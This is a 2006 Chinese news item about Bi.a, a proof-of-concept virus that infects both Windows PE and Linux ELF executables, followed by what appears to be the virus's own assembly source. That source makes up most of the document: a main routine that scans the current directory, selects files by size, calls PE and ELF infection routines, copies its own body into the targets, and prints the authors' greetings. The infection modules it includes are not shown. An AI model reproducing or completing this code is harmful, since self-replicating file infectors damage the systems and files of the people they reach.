| 2006年04月09日16:27 |
|
这种新病毒暂命名为Bi.a,采用低级计算机语言“assembler”编写,目前仅能够感染当前目录下文件,不过,其感染文件范围将包含Linux以及Windows系统下的不同格式--ELF以及PE。 目前该病毒仅为典型概念型标本,编写目的仅为证实是否真的能够创造跨平台病毒,卡巴斯基表示,“不过,我们的经验透露,一旦该病毒标本被病毒编写者们获得,将很快被利用以及借鉴,创造出大量跨平台病毒变种。” “虽然目前Bi.a本身并不危险,但是其背后潜力惊人的跨平台病毒领域将在未来迅速崛起,成为安全关注焦点。” 卡巴斯基已经在其反病毒数据库中加入该病毒探测代码 |
;= Virus Main Procedure (c) 2006 JPanic ===================================
;
; The main virus routine.
;
; PUBLICS:
; VMain()
; dwOrigEIP DWORD
;
;= Directive Warez ========================================================
.486
locals @@
.model flat
_VMAIN_ASM EQU TRUE
include inc/win32.inc
include inc/short.inc
include inc/stack.inc
include inc/elf.inc
include vmain.ash
include osprocs.ash
include inf-pe.ash
include inf-elf.ash
;= Code Warez =============================================================
include codeseg.ash
;= VMain ==================================================================
; Outputs:
; None.
;
;--------------------------------------------------------------------------
PUBLIC VMain
PUBLIC dwOrigEIP
VMain PROC
push L 1234h
org $-4
dwOrigEIP dd offset VHost
pushf
pushad
cld
call @@delta
@@delta:pop ebx
sub esp,size _VirusHeap
lea ebp,[esp+7Fh]
sub ebx,(ofs @@delta - ofs VMain)
mov [vheap.dwVirusDelta],ebx
call Fill_Proc_Table
call dwo [vheap.dwVInit]
jb @@exit
call dwo [vheap.dwVFindFirst]
@@FindLoop: jc @@exit
mov [vheap.dwFileSize],ecx
jecxz @@FindNext
;bsr eax,ecx
db 0Fh,0BDh,0C1h
cmp al,12 ; 4k min
jb @@FindNext
cmp al,22 ; 4mb max
jae @@FindNext
call dwo [vheap.dwVOpenFile]
jc @@FindNext
xchg eax,ebx
call IsImagePE
.if ZERO?
call InfectPE
.else
cmp dwo [ebx],ELF_MAGIC
.if ZERO?
call InfectELF
.endif
.endif
call dwo [vheap.dwVCloseFile]
@@FindNext:
call dwo [vheap.dwVFindNext]
jmp @@FindLoop
@@FindDone:
call dwo [vheap.dwVFindClose]
@@exit: lea esp,[ebp + size _VirusHeap - 07Fh]
popad
popf
ret
VMain ENDP
;--------------------------------------------------------------------------
PUBLIC BuildVBody
BuildVBody PROC
; Copy virus, Set dwOrigEIP=eax, OS_Proc_Switch=dl
push edi ; Save new virus body offset.
mov ecx,VSize
mov esi,dwo [vheap.dwVirusDelta]
rep movsb
pop esi ; ESI = virus body
; Correct Virus Image.
mov dwo [esi+1],eax
mov by [(esi-VCode).OS_Proc_Switch],dl
ret
BuildVBody ENDP
;==========================================================================
; Text Strings
db VName," (c) 2006 JPanic:",0Dh,0Ah
db "This is Sepultura signing off...",0Dh,0Ah
db "This is The Soul Manager saying goodbye...",0Dh,0Ah
db "Greetz to: Immortal Riot, #RuxCon!",0
;==========================================================================
ENDS
END VMain
;==========================================================================
2006年,卡巴斯基实验室发现了一种名为Bi.a的新病毒,该病毒能够同时感染Windows和Linux操作系统。这种使用汇编语言编写的病毒可以感染两种系统下的PE和ELF格式文件。尽管当前版本不具危险性,但其潜在威胁引发了对未来跨平台病毒发展趋势的关注。
758





